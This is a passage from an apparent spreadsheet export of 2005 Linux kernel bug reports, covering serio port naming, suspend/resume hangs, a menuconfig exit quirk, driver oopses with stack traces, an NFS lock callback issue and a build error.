    <t>On my laptop, after booting in the log file I see the following: serio: i8042 AUX0 port at 0x60,0x64 irq 12 serio: i8042 AUX1 port at 0x60,0x64 irq 12 serio: i8042 AUX2 port at 0x60,0x64 irq 12 serio: i8042 AUX3 port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 This match the contents of /sys/bus/serio/devices/serio?/description Now on my system the mouse (touchpad) is on AUX3 which is serio3 and the keyboard is on serio4. But the output from /proc/bus/input/devices places the keyboard with Phys=isa0060/serio0/input0 and the touchpad with Phys=isa0060/serio4/input0 This is confusing. If the serio-&gt;phys name are correct then maybe there could be another line added to proc output with the good serio device name and/or use a different word than serio for the Phys line. Otherwise the phys strings could be reset after the port is registered. Currently the phys string is initialized in drivers/input/serio/i8042.c the i8042_allocate_mux_port which set the name to AUX%d with %d being index while serio-&gt;phys is set using index+1. And For i8042_allocate_kbd_port and i8042_allocate_aux_port serio-&gt;phys string is hardcoded.</t>
  </si>
  <si>
    <t>Crashes after resume with Savage DRI</t>
  </si>
  <si>
    <t>2.6.23</t>
  </si>
  <si>
    <t>2005-05-09 18:28 UTC</t>
  </si>
  <si>
    <t>Johan Brannlund</t>
  </si>
  <si>
    <t>2011-04-18 21:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Breezy Hardware Environment: Acer Aspire 1304LC, Savage Twister VT8636A [ProSavage KN133] Software Environment: xorg 6.8.2, any recent Savage DRI driver snapshot from http://dri.freedesktop.org/snapshots/ Problem Description: When using DRI drivers for my Savage graphics card, everything works fine until after a suspend/resume cycle (I use the suspend2 patches). After resuming, glxinfo still reports "direct rendering: Yes" but running glxgears locks the system hard directly, the glxgears window doesn't even open. According to Savage developer Felix K</t>
  </si>
  <si>
    <t>unintuitive exit sequence in menuconfig</t>
  </si>
  <si>
    <t>2.6.11.9</t>
  </si>
  <si>
    <t>2005-05-12 04:54 UTC</t>
  </si>
  <si>
    <t>2006-10-08 12:28 UTC</t>
  </si>
  <si>
    <t>when using menuconfig to configure kernel, usually esc button is used to move one level up. in some cases with slow machines (this action is surprisingly slow) or over slow network it happens that esc is pressed repeatedly. when esc is pressed at the top level, a dialog asking wether kernel configuration should be saved is presented. the problem is, if at this moment esc is pressed, menuconfig just quits and no configuration is saved. also it's more reasonable to assume that esc at this moment would just dismiss this dalog and allow further editing. proposition: when esc is pressed at confirmation dialog, dismiss that dialog and leave user in menuconfig.</t>
  </si>
  <si>
    <t>System hang while running stress test on RHEL4 with kernel 2.6.12-rc1-mm4</t>
  </si>
  <si>
    <t>2.6.12-rc1 with mm4 patch</t>
  </si>
  <si>
    <t>2005-05-13 01:37 UTC</t>
  </si>
  <si>
    <t>2005-05-26 08:58 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.12-rc1-mm4 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 ltp version: ltp-full-20050505 volanomark version: vmark2_5_0_9.class Problem Description: The test machine hang while running stress test(VolanoMark + fsstress + SDET). Steps to reproduce: 1. build ltp-full-20050505(32bit). 2. mkfs.ext3 /dev/sdc1 /dev/sdc2 /dev/sdc3 /dev/sdc5 3. mkfs.jfs /dev/sdc6 /dev/sdc7 /dev/sdc8 /dev/sdc9 4. mkfs.reiserfs /dev/sdc10 /dev/sdc11 /dev/sdc12 /dev/sdc13 5. install ltp-full-20050505 and enter ~/ltp-full- 20050505/testcase/kernel/fs/fsstress directory. 6. Invoke nfs.script 24 &amp; 7. Install sdet and invoke sdet_infinite &amp; 8. Install IBMJava2-ppc-142 and vmark2_5_0_9.class 9. Invoke ./startup.sh server loop ibm14 &amp; and ./startup.sh client loop ibm14 &amp; After a few hours, the machine will hang up. Additonal information: Here is the xmon output: cpu 0x1: Vector: 100 (System Reset) at [c00000000fff75d0] pc: c00000000032d988: ._spin_lock_irqsave+0x34/0xc8 lr: c00000000006cf80: .__mod_timer+0x9c/0x258 sp: c00000000fff7850 msr: 8000000000081032 current = 0xc00000003970f7e0 paca = 0xc000000000430c00 pid = 14363, comm = java enter ? for help 1:mon&gt; 1:mon&gt; 1:mon&gt; 1:mon&gt; cpu 0x0: Vector: 100 (System Reset) at [c00000000ffffa40] pc: c00000000032d8cc: __lock_text_start+0x6c/0x94 lr: c0000000002e7f08: .tcp_delack_timer+0x34/0x2f0 sp: c00000000ffffcc0 msr: 8000000000089032 current = 0xc00000003a346040 paca = 0xc000000000430400 pid = 13923, comm = java 1:mon&gt; t [c00000000fff78f0] c00000000006cf80 .__mod_timer+0x9c/0x258 [c00000000fff79c0] c0000000002949e4 .sk_reset_timer+0x28/0x60 [c00000000fff7a50] c0000000002edff8 .tcp_v4_rcv+0xc70/0xca0 [c00000000fff7b40] c0000000002c9050 .ip_local_deliver+0x108/0x3ac [c00000000fff7bd0] c0000000002c9bf4 .ip_rcv+0x500/0x6e0 [c00000000fff7c80] c00000000029f540 .netif_receive_skb+0x450/0x510 [c00000000fff7d30] c00000000029f710 .process_backlog+0x110/0x298 [c00000000fff7e10] c00000000029f9a4 .net_rx_action+0x10c/0x31c [c00000000fff7ed0] c0000000000667d8 .__do_softirq+0xdc/0x1b8 [c00000000fff7f90] c000000000014bf0 .call_do_softirq+0x14/0x24 [c0000000397971b0] c0000000000102c4 .do_softirq+0x98/0xac [c000000039797240] c000000000066954 .local_bh_enable+0xa0/0xa8 [c0000000397972c0] c00000000029e7dc .dev_queue_xmit+0x124/0x3a0 [c000000039797360] c0000000002cdb3c .ip_finish_output+0x140/0x398 [c000000039797420] c0000000002ce0c8 .ip_queue_xmit+0x334/0x6d4 [c0000000397975a0] c0000000002e3884 .tcp_transmit_skb+0x3d8/0xa58 [c0000000397976c0] c0000000002e4c80 .tcp_write_xmit+0x194/0x3f8 [c0000000397977b0] c0000000002d58f0 .tcp_sendmsg+0x13b0/0x13f0 [c000000039797940] c0000000002ffb0c .inet_sendmsg+0x88/0xb8 [c0000000397979e0] c00000000028f6dc .sock_sendmsg+0x14c/0x194 [c000000039797bf0] c000000000291bd4 .sys_sendto+0xe0/0x128 [c000000039797d80] c0000000002b52d4 .compat_sys_socketcall+0x1dc/0x2b8 [c000000039797e30] c00000000000db00 syscall_exit+0x0/0x18 --- Exception: c01 (System Call) at 000000000fc4d1cc SP (e6f251e8) is in userspace 1:mon&gt; t [c00000000fff78f0] c00000000006cf80 .__mod_timer+0x9c/0x258 [c00000000fff79c0] c0000000002949e4 .sk_reset_timer+0x28/0x60 [c00000000fff7a50] c0000000002edff8 .tcp_v4_rcv+0xc70/0xca0 [c00000000fff7b40] c0000000002c9050 .ip_local_deliver+0x108/0x3ac [c00000000fff7bd0] c0000000002c9bf4 .ip_rcv+0x500/0x6e0 [c00000000fff7c80] c00000000029f540 .netif_receive_skb+0x450/0x510 [c00000000fff7d30] c00000000029f710 .process_backlog+0x110/0x298 [c00000000fff7e10] c00000000029f9a4 .net_rx_action+0x10c/0x31c [c00000000fff7ed0] c0000000000667d8 .__do_softirq+0xdc/0x1b8 [c00000000fff7f90] c000000000014bf0 .call_do_softirq+0x14/0x24 [c0000000397971b0] c0000000000102c4 .do_softirq+0x98/0xac [c000000039797240] c000000000066954 .local_bh_enable+0xa0/0xa8 [c0000000397972c0] c00000000029e7dc .dev_queue_xmit+0x124/0x3a0 [c000000039797360] c0000000002cdb3c .ip_finish_output+0x140/0x398 [c000000039797420] c0000000002ce0c8 .ip_queue_xmit+0x334/0x6d4 [c0000000397975a0] c0000000002e3884 .tcp_transmit_skb+0x3d8/0xa58 [c0000000397976c0] c0000000002e4c80 .tcp_write_xmit+0x194/0x3f8 [c0000000397977b0] c0000000002d58f0 .tcp_sendmsg+0x13b0/0x13f0 [c000000039797940] c0000000002ffb0c .inet_sendmsg+0x88/0xb8 [c0000000397979e0] c00000000028f6dc .sock_sendmsg+0x14c/0x194 [c000000039797bf0] c000000000291bd4 .sys_sendto+0xe0/0x128 [c000000039797d80] c0000000002b52d4 .compat_sys_socketcall+0x1dc/0x2b8 [c000000039797e30] c00000000000db00 syscall_exit+0x0/0x18 --- Exception: c01 (System Call) at 000000000fc4d1cc SP (e6f251e8) is in userspace</t>
  </si>
  <si>
    <t>ub is much slower in writing than usb-storage</t>
  </si>
  <si>
    <t>2.6.12-rc4-mm1</t>
  </si>
  <si>
    <t>2005-05-14 09:41 UTC</t>
  </si>
  <si>
    <t>2005-09-18 11:04 UTC</t>
  </si>
  <si>
    <t>Distribution: mandrake 10.2 rc2 Hardware Environment: desktop - Asus A7V133 motherboard - Athlon XP 1600 CPU Problem Description: I have a 128Mb usb key drive. Writing to it is very slow with ub driver. Yesterday, I tried to copy 16Mb to this drive then I issued a sync command to unmount it. 11 (eleven) minutes later, I aborted it by rmmoding uhci_hcd. Using usb-storage instead of ub worked well. Steps to reproduce: # modprobe ub (plug the usb key drive) # mount -orw,nosuid,nodev,iocharset=iso8859-15,umask=0 /dev/uba1 /mnt/disk # time sh -c " dd if=/dev/urandom of=/mnt/disk/blah bs=1k count=512 ; sync;" 512+0 enregistrements lus. 512+0 enregistrements</t>
  </si>
  <si>
    <t>Test server hang while running rhr (network) test on RHEL4 with kernel 2.6.12-rc1-mm4</t>
  </si>
  <si>
    <t>2005-05-16 02:43 UTC</t>
  </si>
  <si>
    <t>2005-05-26 23:18 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.12-rc1-mm4 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 RHR: rhr2-rhel4-1.0-14a.noarch.rpm Problem Description: The test server hang while running rhr (network) test on RHEL4 with kernel 2.6.12-rc1-mm4. Steps to reproduce: 1. Download kernel 2.6.12-rc1 and 2.6.12-rc1-mm4 patch from kernel.org, then build the kernel on OpenPower 720 2. Download rhr2-rhel4-1.0-14a.noarch.rpm from rhn.redhat.com and install it on the test machine. 3. Configure and run the rhr test via invoking redhat-ready. Additional information: Here is the backtrace from xmon. 3:mon&gt; e cpu 0x3: Vector: 700 (Program Check) at [c00000000ffe7920] pc: c00000000029632c: .__kfree_skb+0x188/0x240 lr: c000000000296328: .__kfree_skb+0x184/0x240 sp: c00000000ffe7ba0 msr: 8000000000029032 current = 0xc000000107f94040 paca = 0xc000000000431c00 pid = 0, comm = swapper kernel BUG in __kfree_skb at net/core/skbuff.c:282! 3:mon&gt; t [c00000000ffe7c40] d0000000000ebac4 .e100_rx_clean_list+0xa0/0x144 [e100] [c00000000ffe7ce0] d0000000000ed6dc .e100_tx_timeout+0x7c/0xb0 [e100] [c00000000ffe7d70] c0000000002b87bc .dev_watchdog+0xc8/0x154 [c00000000ffe7e00] c00000000006d6b4 .run_timer_softirq+0x180/0x298 [c00000000ffe7ed0] c0000000000667d8 .__do_softirq+0xdc/0x1b8 [c00000000ffe7f90] c000000000014bf0 .call_do_softirq+0x14/0x24 [c000000086b43860] c0000000000102c4 .do_softirq+0x98/0xac [c000000086b438f0] c0000000000669cc .irq_exit+0x70/0x8c [c000000086b43970] c000000000011fb8 .timer_interrupt+0x398/0x47c [c000000086b43a90] c00000000000a2b4 decrementer_common+0xb4/0x100 --- Exception: 901 (Decrementer) at c000000000010554 .dedicated_idle+0x114/0x280 [c000000086b43e80] c0000000000108c8 .cpu_idle+0x3c/0x54 [c000000086b43f00] c00000000003cc8c .start_secondary+0x108/0x148 [c000000086b43f90] c00000000000bd84 .enable_64b_mode+0x0/0x28</t>
  </si>
  <si>
    <t>kdump failed to boot properly on manually causing Panic, Issue with driver hardening</t>
  </si>
  <si>
    <t>2005-05-18 06:46 UTC</t>
  </si>
  <si>
    <t>2006-02-16 06:35 UTC</t>
  </si>
  <si>
    <t>Vivek Goyal</t>
  </si>
  <si>
    <t>Distribution: SLES 9 SP1 --------------------- Hardware Environment: UP, Pentium III (Coppermine),1 GHz, 1GB RAM Network card: intel e100 SCSI driver:Adaptec AIC-7892P U160 --------------------- Software Environment: Linux x330b 2.6.12-rc4-mm1 #2 SMP PREEMPT Thu May 18 19:39:43 IST 2005 i686 i686 i386 GNU/Linux --------------------- Problem Description: When I enable kdump in 2.6.12-rc4-mm1 kernel and try to cause Panic manually, kdump fails to boot clearly into the secondary kernel and gives a panic instead. I have made these changes to the .config file &lt;which earlier used to boot properly) Have enabled CONFIG_SCSI_AIC7XXX CONFIG_SCSI_AIC7XXX_OLD Disabled CONFIG_FUSION Built the network driver as module. I am attaching the config file and serial console out put.</t>
  </si>
  <si>
    <t>2.6.12-rc4-mm2</t>
  </si>
  <si>
    <t>2005-05-18 13:49 UTC</t>
  </si>
  <si>
    <t>2005-08-03 18:47 UTC</t>
  </si>
  <si>
    <t>There is a bug in acpi-cpufreq, due to which we assume that we are booting at highest possible P-state. Ideally, we should be setting the frequency at the boot-time to a known frequency and should not depend on BIOS to set it properly.</t>
  </si>
  <si>
    <t>Problmes of ABI compatibility between kernel and captive-ntfs driver...</t>
  </si>
  <si>
    <t>2.6.11-r4</t>
  </si>
  <si>
    <t>2005-05-19 08:06 UTC</t>
  </si>
  <si>
    <t>Dario</t>
  </si>
  <si>
    <t>2006-01-05 05:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Pentium Mobile (Dothan) 1.6 GhZ Software Environment: captive-ntfs 1.1.5-r2 Problem Description: Using mount to mount the ntfs partition: if I run an ls -s in the directory of the file-system the dimension of the files is the same (the whole size of the HD). If I use konqueror or the captive-cmdline application there's no problem in the output of ls -s. I send this bug becouse the manteiner of captive-ntfs decline each resposability, he tells that there's a problem of ABI compatibility, and that the standard aren't respected. Steps to reproduce: install captive-ntfs mount -t captive-ntfs /dev/hdaX /mnt/winxp cd /mnt/winxp ls -s</t>
  </si>
  <si>
    <t>2.6.11.10</t>
  </si>
  <si>
    <t>S3 resume: no video, hang - Dell Precision M70</t>
  </si>
  <si>
    <t>2005-05-22 22:58 UTC</t>
  </si>
  <si>
    <t>Vladimir Vukicevic</t>
  </si>
  <si>
    <t>2005-10-29 02:35 UTC</t>
  </si>
  <si>
    <t>Fedora Core 4 test 3, with updates; tested with 2.6.11.8, 2.6.11-1.1329_FC4, 2.6.12-rc4-mm2, and 2.6.12-rc4-mm2 with the IDE GTM/STM patch in http://marc.theaimsgroup.com/?l=acpi4linux&amp;m=111680155305976&amp;w=2, though at this point I don't think the issue is necessarily IDE related. With all of the above tested kernels, the system enters S3 suspend (with a minimum of modules loaded, init=/bin/sh.. ata_piix &amp; ext3 are the only things loaded, essentially). On unsuspend, I hear the dvd drive make a click, and the HDD light lights up, as does the wireless light. The LCD backlight does not turn on; the system is responsive to caps lock changes and Fn-F2 hardware wireless kill switch toggle. I'll attempt to get a serial console going and see if that can provide some more insight as to what's going on. I'm open to any ideas as far as debugging and collecting info.</t>
  </si>
  <si>
    <t>lockd: Server callback procedure NLM_GRANTED is replied LCK_DENIED</t>
  </si>
  <si>
    <t>2005-05-23 04:50 UTC</t>
  </si>
  <si>
    <t>Jean-Louis ROCHETTE</t>
  </si>
  <si>
    <t>2005-09-01 15:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core release 2 (Tettnang) Hardware Environment: Software Environment: Problem Description: The Linux client does some file locking on the server: It loops doing open, lock entire file, close, on the same file, forever. Lock conflicts are produced by another NFSv3 client (Linux or Solaris) which runs the same basic test. When there is a conflict on the blocking lock request, the server returns status LCK_BLOCKED. When the conflicting lock is released, the server calls back the Linux client with procedure NLM_GRANTED, and the client normally replies with status LCK_GRANTED, to mean that it accepts the lock. It seems that when the time interval between the LCK_BLOCKED reply and the NLM_GRANTED callback is short (less than 10 ms) then the Linux client replies LCK_DENIED, as if it were not yet aware of the locking context... I had the same behavior with a kernel 2.4.19-16, Mandrake Linux release 9.0 (dolphin) for i586. Here is an extract from the network trace: No. Time Source Destination Protocol Info 2268 12:25:01.180906 LinuxClient EmcServer NLM V4 LOCK Call (Reply In 2270) FH:0xee7ffc82 svid:20332 pos:0-0 TCP: Src Port: 798, Dst Port: 51022 RPC: Type:Call XID:0xda54849e NLM: V4 Procedure: LOCK (2) cookie: b6440100 block: Yes exclusive: Yes lock reclaim: No state: 0 No. Time Source Destination Protocol Info 2269 12:25:01.180952 SunClient EmcServer NLM V4 UNLOCK Call (Reply In 2273) FH:0xee7ffc82 svid:7551 pos:0-0 TCP: Src Port: 917, Dst Port: 51022 RPC: Type:Call XID:0x819e0071 NLM: V4 Procedure: UNLOCK (4) cookie: 000094c3 lock No. Time Source Destination Protocol Info 2270 12:25:01.184005 EmcServer LinuxClient NLM V4 LOCK Reply (Call In 2268) TCP: Src Port: 51022, Dst Port: 798 RPC: Type:Reply XID:0xda54849e NLM: V4 Procedure: LOCK (2) cookie: b6440100 stat: NLM_BLOCKED (3) No. Time Source Destination Protocol Info 2271 12:25:01.184095 EmcServer LinuxClient NLM V4 GRANTED Call (Reply In 2272) FH:0xee7ffc82 svid:20332 pos:0-0 UDP: Src Port: 49188, Dst Port: 32769 RPC: Type:Call XID:0xfe09ceb2 NLM: V4 Procedure: GRANTED (5) cookie: b6440100 exclusive: Yes lock No. Time Source Destination Protocol Info 2272 12:25:01.184247 LinuxClient EmcServer NLM V4 GRANTED Reply (Call In 2271) UDP: Src Port: 32769, Dst Port: 49188 RPC: Type:Reply XID:0xfe09ceb2 NLM: V4 Procedure: GRANTED (5) cookie: b6440100 stat: NLM_DENIED (1) No. Time Source Destination Protocol Info 2273 12:25:01.188530 EmcServer SunClient NLM V4 UNLOCK Reply (Call In 2269) TCP: Src Port: 51022, Dst Port: 917 RPC: Type:Reply XID:0x819e0071 NLM: V4 Procedure: UNLOCK (4) cookie: 000094c3 stat: NLM_GRANTED (0) At frame 2270, the server replies BLOCKED, and 90 us later at frame 2271, it calls backs to say it is now granted. At frame 2272, Linux denies the callback. I never had this problem with a Solaris client, and I have noticed no timing restriction in the definition of the NLM protocol, so I think there is something wrong in the Linux implementation. Steps to reproduce: I can provide a small foo.cxx and launchfoo.cxx that I use to produce this case. I can send them by mail, and also more network traces if required. Just let me know. Thanks, Jean-Louis.</t>
  </si>
  <si>
    <t>2.6.12-rc5</t>
  </si>
  <si>
    <t>2005-05-25 11:42 UTC</t>
  </si>
  <si>
    <t>2005-05-27 05:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.1 Hardware Environment: ULi 1689/M5263 based motherboard (Asrock K9Combo) + Athlon 64b in 32b mode + 1Go Software Environment: Linux 2.6.12-rc5 preempt local apic Didn't test without preempt, may work as the stack shows it. Problem Description: Driver crashes at load. Used to load (but not work) with 2.6.11.10. Oops is : May 25 19:51:07 sirius kernel: BIOS-e820: 0000000000000000 - 000000000009fc00 ( usable) May 25 19:51:07 sirius kernel: BIOS-e820: 000000000009fc00 - 00000000000a0000 ( reserved) May 25 19:51:07 sirius kernel: BIOS-e820: 00000000000e8000 - 0000000000100000 ( reserved) May 25 19:51:07 sirius kernel: BIOS-e820: 0000000000100000 - 000000003ffb0000 ( usable) May 25 19:51:07 sirius kernel: BIOS-e820: 000000003ffb0000 - 000000003ffc0000 ( ACPI data) May 25 19:51:07 sirius kernel: BIOS-e820: 000000003ffc0000 - 000000003fff0000 ( ACPI NVS) May 25 19:51:07 sirius kernel: BIOS-e820: 000000003fff0000 - 0000000040000000 ( reserved) May 25 19:51:07 sirius kernel: BIOS-e820: 00000000ff7c0000 - 0000000100000000 ( reserved) May 25 19:51:07 sirius kernel: Warning only 896MB will be used. May 25 19:51:07 sirius kernel: Use a HIGHMEM enabled kernel. May 25 19:51:07 sirius kernel: Processor #0 15:15 APIC version 16 May 25 19:51:07 sirius kernel: IOAPIC[0]: apic_id 1, version 17, address 0xfec00 000, GSI 0-23 May 25 19:51:07 sirius kernel: Enabling APIC mode: Flat. Using 1 I/O APICs May 25 19:51:07 sirius kernel: Allocating PCI resources starting at 40000000 (ga p: 40000000:bf7c0000) May 25 19:51:07 sirius kernel: Built 1 zonelists May 25 19:51:07 sirius kernel: CPU 0 irqstacks, hard=c05f8000 soft=c05f7000 May 25 19:51:07 sirius kernel: PID hash table entries: 4096 (order: 12, 65536 by tes) May 25 19:51:07 sirius kernel: Detected 1800.201 MHz processor. May 25 19:51:07 sirius kernel: Console: colour VGA+ 80x25 May 25 19:51:07 sirius kernel: Dentry cache hash table entries: 131072 (order: 7 , 524288 bytes) May 25 19:51:07 sirius kernel: Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) May 25 19:51:07 sirius kernel: Checking if this processor honours the WP bit eve n in supervisor mode... Ok. May 25 19:51:07 sirius kernel: Mount-cache hash table entries: 512 May 25 19:51:07 sirius kernel: CPU: AMD Athlon(tm) 64 Processor 3000+ stepping 0 0 May 25 19:51:07 sirius kernel: ENABLING IO-APIC IRQs May 25 19:51:07 sirius kernel: PCI: Probing PCI hardware (bus 00) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 * 10 11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 *5 6 7 10 11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 1 0 *11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKD] (IRQs *3 4 5 6 7 10 11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 *5 6 7 10 11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 *5 6 7 10 11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 1 0 *11 12 14 15) May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 1 0 11 12 14 15) *9 May 25 19:51:07 sirius kernel: ACPI: PCI Interrupt Link [LNKP] (IRQs 3 4 *5 6 7 10 11 12 14 15) May 25 19:51:07 sirius kernel: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A May 25 19:51:07 sirius kernel: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A May 25 19:51:07 sirius kernel: bttv0: using tuner=3 May 25 19:51:07 sirius kernel: hda: IBM-DJNA-371350, ATA DISK drive May 25 19:51:07 sirius kernel: hdb: IC35L040AVER07-0, ATA DISK drive May 25 19:51:07 sirius kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 May 25 19:51:07 sirius kernel: hdc: SONY CDU4811, ATAPI CD/DVD-ROM drive May 25 19:51:07 sirius kernel: hdd: HL-DT-ST DVDRAM GSA-4160B, ATAPI CD/DVD-ROM drive May 25 19:51:07 sirius kernel: ide1 at 0x170-0x177,0x376 on irq 15 May 25 19:51:07 sirius kernel: TCP established hash table entries: 131072 (order : 8, 1048576 bytes) May 25 19:51:07 sirius kernel: TCP bind hash table entries: 65536 (order: 8, 183 5008 bytes) May 25 19:51:07 sirius kernel: ip_conntrack version 2.1 (7168 buckets, 57344 max ) - 236 bytes per conntrack May 25 19:51:07 sirius kernel: ip_tables: (C) 2000-2002 Netfilter core team May 25 19:51:07 sirius kernel: cpu_init done, current fid 0xa, vid 0x6 May 25 19:51:07 sirius kernel: ACPI wakeup devices: May 25 19:51:07 sirius kernel: HTT PS2K PS2M UAR1 AC97 MC97 LAN USB0 USB1 USB2 UB20 May 25 19:51:07 sirius kernel: VFS: Mounted root (ext3 filesystem) readonly. May 25 19:51:08 sirius kernel: drivers/net/tulip/media.c:202: spin_unlock(driver s/net/tulip/tulip_core.c:f6828948) not locked May 25 19:51:08 sirius kernel: ------------[ cut here ]------------ May 25 19:51:08 sirius kernel: kernel BUG at kernel/sched.c:2593! May 25 19:51:08 sirius kernel: invalid operand: 0000 [#1] May 25 19:51:08 sirius kernel: PREEMPT May 25 19:51:08 sirius kernel: Modules linked in: tulip May 25 19:51:08 sirius kernel: CPU: 0 May 25 19:51:08 sirius kernel: EIP: 0060:[&lt;c0120cf7&gt;] Not tainted VLI May 25 19:51:08 sirius kernel: EFLAGS: 00010297 (2.6.12-rc5) May 25 19:51:08 sirius kernel: EIP is at sub_preempt_count+0x27/0x40 May 25 19:51:08 sirius kernel: eax: 00000000 ebx: 00010000 ecx: f6828280 e dx: 00000001 May 25 19:51:08 sirius kernel: esi: 00000000 edi: 0001e448 ebp: f6f71dc8 e sp: f6f71dc8 May 25 19:51:08 sirius kernel: ds: 007b es: 007b ss: 0068 May 25 19:51:08 sirius kernel: Process modprobe (pid: 1120, threadinfo=f6f71000 task=f7f3c020) May 25 19:51:08 sirius kernel: Stack: f6f71e10 f8832e5a f883a544 f8839b6f 000000 ca f883abd4 f6828948 c012eba7 May 25 19:51:08 sirius kernel: 0001e450 00000246 0001e400 51021200 f68282 80 00001200 f6828000 00001200 May 25 19:51:08 sirius kernel: 0000ffff 00007849 f6f71e58 f8833f2b f68280 00 00000002 00000000 00001200 May 25 19:51:08 sirius kernel: Call Trace: May 25 19:51:08 sirius kernel: [&lt;c0104ddf&gt;] show_stack+0x7f/0xa0 May 25 19:51:08 sirius kernel: [&lt;c0104f7a&gt;] show_registers+0x15a/0x1d0 May 25 19:51:08 sirius kernel: [&lt;c01051e8&gt;] die+0x158/0x2e0 May 25 19:51:08 sirius kernel: [&lt;c0105785&gt;] do_invalid_op+0xb5/0xc0 May 25 19:51:08 sirius kernel: [&lt;c01048cb&gt;] error_code+0x4f/0x54 May 25 19:51:08 sirius kernel: [&lt;f8832e5a&gt;] tulip_mdio_write+0x24a/0x510 [tulip ] May 25 19:51:08 sirius kernel: [&lt;f8833f2b&gt;] tulip_find_mii+0x2eb/0x330 [tulip] May 25 19:51:08 sirius kernel: [&lt;f8837702&gt;] tulip_init_one+0xac2/0xd70 [tulip] May 25 19:51:08 sirius kernel: [&lt;c0268a1b&gt;] pci_device_probe_static+0x4b/0x70 May 25 19:51:08 sirius kernel: [&lt;c0268a7c&gt;] __pci_device_probe+0x3c/0x50 May 25 19:51:08 sirius kernel: [&lt;c0268abc&gt;] pci_device_probe+0x2c/0x60 May 25 19:51:08 sirius kernel: [&lt;c02d8d4e&gt;] driver_probe_device+0x2e/0x80 May 25 19:51:08 sirius kernel: [&lt;c02d8eb2&gt;] driver_attach+0x52/0xa0 May 25 19:51:08 sirius kernel: [&lt;c02d9409&gt;] bus_add_driver+0xa9/0xf0 May 25 19:51:08 sirius kernel: [&lt;c0268da3&gt;] pci_register_driver+0x93/0xc0 May 25 19:51:08 sirius kernel: [&lt;f887303a&gt;] tulip_init+0x3a/0x3c [tulip] May 25 19:51:08 sirius kernel: [&lt;c015200b&gt;] sys_init_module+0x19b/0x290 May 25 19:51:08 sirius kernel: [&lt;c0103e45&gt;] syscall_call+0x7/0xb May 25 19:51:08 sirius kernel: Code: 00 00 00 00 55 89 c2 b8 00 f0 ff ff 21 e0 8 b 40 14 89 e5 39 d0 7c 14 81 fa fe 00 00 00 76 16 b8 00 f0 ff ff 21 e0 29 50 14 c9 c3 &lt;0f&gt; 0b 21 0a 76 8e 4b c0 eb e2 84 c0 75 e6 0f 0b 25 0a 76 8e 4b Steps to reproduce: Let hotplug modprobe the driver at boot on this kind of hardware. Don't know if Ali driver was integrated in tulip driver, but it seems since the driver is loaded by hotplug.</t>
  </si>
  <si>
    <t>Build error</t>
  </si>
  <si>
    <t>2005-05-25 14:22 UTC</t>
  </si>
  <si>
    <t>hans.borjes</t>
  </si>
  <si>
    <t>2005-05-28 15:48 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.1 Hardware Environment: i386 Software Environment: 2.6.12-rc4 Problem Description: Build error Steps to reproduce: drivers/char/ipmi/ipmi_devintf.c:537: error: too many arguments to function `class_simple_device_remove'</t>
  </si>
  <si>
    <t>oops when apps that are using alsa exit</t>
  </si>
  <si>
    <t>2.6.12-rc5-mm1</t>
  </si>
  <si>
    <t>2005-05-25 17:34 UTC</t>
  </si>
  <si>
    <t>2005-05-28 07:01 UTC</t>
  </si>
  <si>
    <t>Pentium III 800MHz 512MB ram CM8738 sound card on 2.6.12-rc5-mm1 on gentoo-linux play sound through alsa, then quit program. I get an oops: Unable to handle kernel NULL pointer dereference at virtual address 000000a4 printing eip: c02acb79 *pde = 00000000 Oops: 0002 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;c02acb79&gt;] Not tainted VLI EFLAGS: 00210286 (2.6.12-rc5-mm1-personal) EIP is at snd_pcm_mmap_data_close+0xa/0x11 eax: 00000000 ebx: db194000 ecx: d9fc8720 edx: d9f24b40 esi: dfabd080 edi: d9f24b18 ebp: df461b80 esp: db195f58 ds: 007b es: 007b ss: 0068 Process mplayer (pid: 14876, threadinfo=db194000 task=df382540) Stack: c013dd8c d9f24b18 00000000 df461b80 b653d000 c013f1d5 d9f24b18 d9f24b18 d9f24b18 b6545000 c013f4ec df461b80 d9f24b18 d9fc8858 df461b80 df461bb0 00008000 db194000 c013f529 df461b80 b653d000 00008000 b653d000 00008000 Call Trace: [&lt;c013dd8c&gt;] remove_vm_struct+0x49/0x6f [&lt;c013f1d5&gt;] unmap_vma_list+0x14/0x1f [&lt;c013f4ec&gt;] do_munmap+0xe7/0xf3 [&lt;c013f529&gt;] sys_munmap+0x31/0x4b [&lt;c0102bd7&gt;] sysenter_past_esp+0x54/0x75 Code: 8b 54 24 04 81 48 14 00 00 08 00 c7 40 44 fc c6 38 c0 89 50 50 8b 42 60 ff 80 a4 00 00 00 31 c0 c3 8b 44 24 04 8b 40 50 8b 40 60 &lt;ff&gt; 88 a4 00 00 00 c3 8b 44 24 04 8b 40 50 8b 40 60 ff 80 a4 00</t>
  </si>
  <si>
    <t>ACPI battery monitor does not work</t>
  </si>
  <si>
